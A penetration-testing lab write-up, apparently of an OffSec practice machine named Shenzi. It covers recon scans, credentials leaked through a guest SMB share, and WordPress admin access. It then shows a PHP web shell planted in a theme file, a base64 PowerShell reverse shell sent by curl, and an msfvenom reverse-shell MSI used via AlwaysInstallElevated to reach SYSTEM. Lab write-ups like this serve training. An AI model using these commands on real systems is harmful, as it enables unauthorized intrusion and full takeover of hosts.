We start off with a basic nmap scan of the target (my output below is condensed)
┌──(root㉿user)-[/home/user]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
<SNIP>
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.205.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.205.55/dashboard/
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
I followed this up instantly with dirsearch to probe the /dashboard endpoint:
┌──(root㉿user)-[/home/user]
└─# dirsearch -u 192.168.205.55/dashboard -x 403
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/user/reports/_192.168.205.55/_dashboard_26-04-30_06-34-40.txt
Target: https://192.168.205.55/
[06:34:40] Starting: dashboard/
[06:34:49] 200 - 4KB - /dashboard/404.html
[06:35:20] 301 - 349B - /dashboard/de -> https://192.168.205.55/dashboard/de/
[06:35:21] 301 - 351B - /dashboard/docs -> https://192.168.205.55/dashboard/docs/
[06:35:21] 200 - 14KB - /dashboard/docs/
[06:35:23] 301 - 349B - /dashboard/es -> https://192.168.205.55/dashboard/es/
[06:35:24] 200 - 31KB - /dashboard/faq.html
[06:35:24] 200 - 1KB - /dashboard/favicon.ico
[06:35:26] 301 - 349B - /dashboard/fr -> https://192.168.205.55/dashboard/fr/
[06:35:29] 200 - 7KB - /dashboard/images/
[06:35:29] 301 - 353B - /dashboard/images -> https://192.168.205.55/dashboard/images/
[06:35:32] 301 - 349B - /dashboard/it -> https://192.168.205.55/dashboard/it/
[06:35:45] 200 - 82KB - /dashboard/phpinfo.php
[06:35:58] 301 - 349B - /dashboard/pl -> https://192.168.205.55/dashboard/pl/
[06:36:04] 301 - 349B - /dashboard/ru -> https://192.168.205.55/dashboard/ru/
Port 21: FTP
I attempted to brute force this using common username / password combinations, to no avail.
Port 80: Website

This is the default XAMPP landing page, which confirms that we have hit a stock, out-of-the-box XAMPP installation on Windows. I then probed the directories further with an exhaustive ffuf run (this scan started when I began the box and was still going over an hour later):
┌──(root㉿user)-[/home/user/Downloads]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -u http://$target/FUZZ -recursion -recursion-depth 5 -e .php,.php3,.php4,.php5,.phtml,.phar,.html,.htm,.inc,.tpl,.htaccess,.htpasswd,.conf,.config,.log,.sql,.bak,.old,.swp,~,.zip,.tar,.gz,.tgz,.7z,.rar,.sh,.py,.pl,.cgi,.rb,.lua,.js,.json,.xml,.wsdl,.txt,.pdf,.dist,.example,.local,.env,.git,.htaccess.bak
ffuf v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.205.55/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Extensions : .php .php3 .php4 .php5 .phtml .phar .html .htm .inc .tpl .htaccess .htpasswd .conf .config .log .sql .bak .old .swp ~ .zip .tar .gz .tgz .7z .rar .sh .py .pl .cgi .rb .lua .js .json .xml .wsdl .txt .pdf .dist .example .local .env .git .htaccess.bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
img [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/img/FUZZ
webalizer [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 38ms]
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 25ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 39ms]
dashboard [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 25ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/FUZZ
applications.html [Status: 200, Size: 3607, Words: 770, Lines: 80, Duration: 33ms]
IMG [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/IMG/FUZZ
Img [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 22ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/Img/FUZZ
Applications.html [Status: 200, Size: 3607, Words: 770, Lines: 80, Duration: 25ms]
xampp [Status: 301, Size: 340, Words: 22, Lines: 10, Duration: 35ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/xampp/FUZZ
<SNIP>
entering interactive mode
type "help" for a list of commands, or ENTER to resume.
> afw 102
[INFO] New word count filter value set
>
[INFO] ------ RESUMING -----
Webalizer [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/Webalizer/FUZZ
[INFO] Starting queued job on target: http://192.168.205.55/img/FUZZ
[INFO] Starting queued job on target: http://192.168.205.55/dashboard/FUZZ
images [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/images/FUZZ
docs [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 27ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/docs/FUZZ
de [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 21ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/de/FUZZ
fr [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 26ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/fr/FUZZ
es [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/es/FUZZ
404.html [Status: 200, Size: 4384, Words: 915, Lines: 122, Duration: 24ms]
Images [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/Images/FUZZ
ru [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ru/FUZZ
it [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/it/FUZZ
index.html [Status: 200, Size: 7576, Words: 1305, Lines: 168, Duration: 29ms]
pl [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 24ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/pl/FUZZ
javascripts [Status: 301, Size: 356, Words: 22, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/javascripts/FUZZ
stylesheets [Status: 301, Size: 356, Words: 22, Lines: 10, Duration: 39ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/stylesheets/FUZZ
faq.html [Status: 200, Size: 31751, Words: 6614, Lines: 524, Duration: 24ms]
ro [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 23ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ro/FUZZ
tr [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 27ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/tr/FUZZ
hu [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/hu/FUZZ
jp [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/jp/FUZZ
Docs [Status: 301, Size: 349, Words: 22, Lines: 10, Duration: 32ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/Docs/FUZZ
DE [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/DE/FUZZ
IMAGES [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 33ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/IMAGES/FUZZ
IT [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/IT/FUZZ
FR [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/FR/FUZZ
ES [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 35ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ES/FUZZ
FAQ.html [Status: 200, Size: 31751, Words: 6614, Lines: 524, Duration: 22ms]
howto.html [Status: 200, Size: 6021, Words: 942, Lines: 132, Duration: 27ms]
StyleSheets [Status: 301, Size: 356, Words: 22, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/StyleSheets/FUZZ
ur [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 21ms]
[INFO] Adding a new job to the queue: http://192.168.205.55/dashboard/ur/FUZZ
The only interesting endpoint at this point was /dashboard/phpinfo.php.

This endpoint gives us a username: the Environment section of phpinfo() output exposes the variables of the account Apache runs under (USERNAME, USERPROFILE) along with paths such as DOCUMENT_ROOT and the effective PHP configuration (disable_functions, open_basedir). In the information-gathering stage this is very useful, and it is exactly why phpinfo.php should never be reachable on a production host.
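As an added helper that is not part of the original write-up, the script below pulls the recon-relevant fields out of a saved phpinfo page. phpinfo() renders each setting as a table row with a `<td class="e">` name cell followed by one or two `<td class="v">` value cells (the second, where present, is the master value); the parser keeps the local value. The embedded HTML is a constructed sample, and the username and paths in it are made up, since the real page is not reproduced here.

```python
from html.parser import HTMLParser

# Constructed sample (not the target's real page) in the shape phpinfo() emits.
SAMPLE_PHPINFO = """
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">USERNAME </td><td class="v">exampleuser </td></tr>
<tr><td class="e">USERPROFILE </td><td class="v">C:\\Users\\exampleuser </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">C:/xampp/htdocs </td></tr>
<tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 </td></tr>
<tr><td class="e">disable_functions </td><td class="v">no value </td><td class="v">no value </td></tr>
<tr><td class="e">open_basedir </td><td class="v">no value </td><td class="v">no value </td></tr>
</table>
"""

# Settings worth pulling out during recon: who Apache runs as, where the web root is,
# and whether PHP will let a web shell call system() or read outside the web root.
INTERESTING = (
    "USERNAME", "USERPROFILE", "DOCUMENT_ROOT", "SCRIPT_FILENAME", "SERVER_SOFTWARE",
    "disable_functions", "open_basedir", "allow_url_include",
)


class PhpInfoParser(HTMLParser):
    """Collect name -> local value for every name/value row in phpinfo() output."""

    def __init__(self):
        super().__init__()
        self.rows = {}
        self._cells = None   # (class, text) cells of the <tr> being read, or None
        self._in_td = False
        self._cls = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._cells = []
        elif tag == "td" and self._cells is not None:
            self._in_td, self._cls, self._buf = True, dict(attrs).get("class"), []

    def handle_data(self, data):
        if self._in_td:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "td" and self._in_td:
            self._cells.append((self._cls, "".join(self._buf).strip()))
            self._in_td = False
        elif tag == "tr" and self._cells is not None:
            # name sits in td.e, local value in the first td.v; header rows use <th> and are skipped
            if len(self._cells) >= 2 and self._cells[0][0] == "e":
                self.rows[self._cells[0][1]] = self._cells[1][1]
            self._cells = None


def phpinfo_settings(html: str) -> dict:
    """Every name -> local value pair found in the page."""
    parser = PhpInfoParser()
    parser.feed(html)
    return parser.rows


def interesting_settings(html: str) -> dict:
    """Only the recon-relevant subset, in INTERESTING order."""
    rows = phpinfo_settings(html)
    return {name: rows[name] for name in INTERESTING if name in rows}


if __name__ == "__main__":
    for name, value in interesting_settings(SAMPLE_PHPINFO).items():
        print(f"{name:18} {value}")
```

Against a live target, save the page first (for example `curl -s http://$target/dashboard/phpinfo.php > phpinfo.html`) and pass the file contents to `interesting_settings`. A populated `disable_functions` is the thing to check before relying on a `system()` web shell later.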
Port 445: SMB
I noted that there was a guest account enabled on the target and there was a particularly interesting share (Shenzi) that our user had read access to:
┌──(root㉿user)-[/home/user]
└─# nxc smb $target -u 'guest' -p '' --shares
SMB 192.168.205.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.205.55 445 SHENZI [+] shenzi\guest:
SMB 192.168.205.55 445 SHENZI [*] Enumerated shares
SMB 192.168.205.55 445 SHENZI Share Permissions Remark
SMB 192.168.205.55 445 SHENZI ----- ----------- ------
SMB 192.168.205.55 445 SHENZI IPC$ READ Remote IPC
SMB 192.168.205.55 445 SHENZI Shenzi READ
┌──(root㉿user)-[/home/user]
└─# cat /root/.nxc/modules/nxc_spider_plus/192.168.205.55.json
{
"Shenzi": {
"passwords.txt": {
"atime_epoch": "2020-05-29 14:26:15",
"ctime_epoch": "2020-05-27 20:12:05",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "894 B"
},
"readme_en.txt": {
"atime_epoch": "2020-05-29 14:26:15",
"ctime_epoch": "2020-05-18 07:55:45",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "7.19 KB"
},
"sess_klk75u2q4rpgfjs3785h6hpipp": {
"atime_epoch": "2020-05-28 16:45:09",
"ctime_epoch": "2020-05-27 17:48:21",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "3.79 KB"
},
"why.tmp": {
"atime_epoch": "2020-05-28 16:45:09",
"ctime_epoch": "2013-03-30 12:28:59",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "213 B"
},
"xampp-control.ini": {
"atime_epoch": "2020-05-28 16:45:09",
"ctime_epoch": "2020-05-25 19:31:49",
"mtime_epoch": "2020-05-29 14:26:51",
"size": "178 B"
}
}
}
I used the following command to grab the entire Shenzi share:
smbget -R smb://$target/Shenzi -n
Now comes the tedious part: examining the information therein.
passwords.txt
┌──(root㉿user)-[/run/…/user/2024/HTBox/shenzi]
└─# cat passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight35
As you will note from the nmap scan above, MySQL was open. I tried to obtain a connection using root as the user (leaving the password blank) but the server (as suspected) was not configured to accept connections from outside the local host.
The only password that looked unique (rather than a stock XAMPP default) was the one listed against the WordPress installation. BUT: where is the WordPress instance?
This is where OffSec differs greatly from HackTheBox, and I would say that if you are like me and have trained solely on HTB boxes for well over a year, the methodology changes BIG TIME for user enumeration and initial access. On an HTB machine you would likely find the WordPress installation by fuzzing directories, but here the WordPress installation was to be found at /shenzi.

There are tools like wpscan that you can use to enumerate WordPress, but as I already had a login for the admin user, I went straight to the login page at /shenzi/wp-login.php and used the credentials to log in.
CPTS has a module for attacking WordPress, Joomla and many more; my next moves were based on my notes from those modules — here.
Once logged in as admin, go to Appearance > Theme Editor, select the active theme and then, on the right, pick any template file that ends in .php to edit.
I added the following line of code (at line 9 — below) to 404.php:
system($_GET[0]);
Once saved, you have placed a PHP web shell inside the theme file, which can be executed with the following request (note: the theme here is twentytwenty, so the path will not always be the same):
┌──(root㉿user)-[/run/…/user/2024/HTBox/shenzi]
└─# curl "http://192.168.205.55/shenzi/wp-content/themes/twentytwenty/404.php?0=dir"
Volume in drive C has no label.
Volume Serial Number is E24B-9BB9
Directory of C:\xampp\htdocs\shenzi\wp-content\themes\twentytwenty
05/28/2020 09:03 AM <DIR> .
05/28/2020 09:03 AM <DIR> ..
05/28/2020 09:03 AM 269 .stylelintrc.json
04/29/2026 04:20 PM 856 404.php
05/28/2020 09:03 AM <DIR> assets
05/28/2020 09:03 AM <DIR> classes
05/28/2020 09:03 AM 3,218 comments.php
You can see that the above request gives us a directory listing on the target when we pass dir. With this established, we can proceed to obtain an interactive shell on the target.
I went over to revshells and grabbed a base64-encoded PowerShell reverse shell (URL-encoded):
┌──(root㉿user)-[/run/…/user/2024/HTBox/shenzi]
└─# curl "http://192.168.205.55/shenzi/wp-content/themes/twentytwenty/404.php?0=powershell%20-e%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%3D%3D"
This was successful and I obtained a reverse shell as the user shenzi.
Privilege Escalation
My Windows privilege escalation methodology is to check whoami /priv (list privileges) and run PowerUp.ps1.
Here we got somewhat lucky: the script revealed that the AlwaysInstallElevated registry key is enabled. This misconfiguration tells the Windows Installer to run any MSI package with full NT AUTHORITY\SYSTEM privileges, regardless of the installing user's actual permissions; it only takes effect when the value is set to 1 under both HKLM and HKCU.
PowerUp's Write-UserAddMSI function abuses this by writing out a precompiled MSI that, when run, prompts for a new local user and adds it to the Administrators group. Any MSI will do, though, so a custom package carrying a reverse shell works just as well and needs no interactive prompt; that is the route taken below.
I have included my payload log below from PowerUp.ps1:
PS C:\Users\shenzi\DEsktop> Import-Module ./PowerUp.ps1
PS C:\Users\shenzi\DEsktop> Invoke-allChecks
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
Name : edgeupdate
Check : Modifiable Service Files
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
Name : edgeupdate
Check : Modifiable Service Files
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
Name : edgeupdatem
Check : Modifiable Service Files
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
Name : edgeupdatem
Check : Modifiable Service Files
ModifiablePath : C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps
IdentityReference : SHENZI\shenzi
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\shenzi\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
Check : AlwaysInstallElevated Registry Key
AbuseFunction : Write-UserAddMSI
DefaultDomainName : SHENZI
DefaultUserName : shenzi
DefaultPassword :
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
Check : Registry Autologons
I used the following manual checks to confirm that the Registry keys were enabled for this attack (both commands have to return 0x1)
PS C:\Users\shenzi\DEsktop> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\Users\shenzi\DEsktop> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
I then ran systeminfo on the target to double-check the architecture before producing a payload with msfvenom for our malicious reverse.msi package:
PS C:\Users\shenzi\DEsktop> systeminfo
Host Name: SHENZI
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: admin
Registered Organization:
Product ID: 00331-10000-00001-AA088
Original Install Date: 12/3/2021, 8:19:53 AM
System Boot Time: 8/2/2024, 1:10:20 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
The above output confirms that we are dealing with an x64 target. I generated the following payload with msfvenom and transferred the resulting MSI onto the target machine ready for deployment:
┌──(root㉿user)-[/tmp]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.208 LPORT=4444 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
I then set up my listener on Kali (port 4444) and executed the malicious reverse.msi package to receive a connection back as nt authority\system:
PS C:\Users\shenzi\DEsktop> dir
Directory: C:\Users\shenzi\DEsktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/29/2026 3:29 PM 34 local.txt
-a---- 4/29/2026 4:38 PM 600580 PowerUp.ps1
-a---- 4/29/2026 4:47 PM 159744 reverse.msi
PS C:\Users\shenzi\DEsktop> msiexec /quiet /qn /i C:\Users\shenzi\Desktop\reverse.msi
┌──(root㉿user)-[/tmp]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.205.55] 59939
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>whoami
whoami
nt authority\system